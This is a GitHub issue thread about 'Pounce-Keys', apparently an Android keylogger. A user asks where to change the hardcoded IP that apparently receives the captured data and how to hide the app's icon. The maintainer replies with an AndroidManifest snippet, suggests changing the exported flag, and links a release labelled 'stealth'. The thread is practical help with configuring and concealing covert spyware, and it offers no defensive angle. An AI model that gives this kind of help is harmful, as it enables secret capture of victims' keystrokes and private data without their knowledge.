Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Couldn't find "192.168.0.135" ip to change after opening Pounce-Keys.apk in APK Editor Studio in 2.0 release #4

Closed
2picodin9 opened this issue Mar 4, 2023 · 5 comments

Comments

@2picodin9
Copy link

No description provided.

@2picodin9
Copy link
Author

@NullPounce please help me to address this issue!

@2picodin9
Copy link
Author

Ops! I found out needed ip address to change in Pounce-Keys.apk. I didn't dowload lateast version of it so i couldn't found it

@2picodin9
Copy link
Author

@NullPounce but i can't hide app icon from release 2.0

@NullPounce
Copy link
Owner

what version of android? and sorry yes that has not been 100% implemented, whole recode, compare the older mainfest file as i think being exported to true is the issue, seen an error about android 10 and under but i still need to implement that, thank you.

<application
		android:allowBackup="true"
		android:icon="@drawable/bac"
		android:label="@string/app_name"
		android:theme="@style/AppTheme"
		android:resizeableActivity = "true">
		<activity
			android:name=".MainActivity"
			android:label="@string/app_name"
			android:exported="false">
			<intent-filter>

try changing "android:exported="false">"
to
android:exported="true">

and let me know if that helps, if not regardless i have some genymotion to spin up ha ha

@NullPounce
Copy link
Owner

thank you for the notice very much! I have made a updated version and release right away. :)

here's a direct link to the new apk
https://github.com/NullPounce/pounce-keys/releases/download/2.1/pounce-keys-2.1-stealth.apk

release notes show the edits, let me know if this works.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants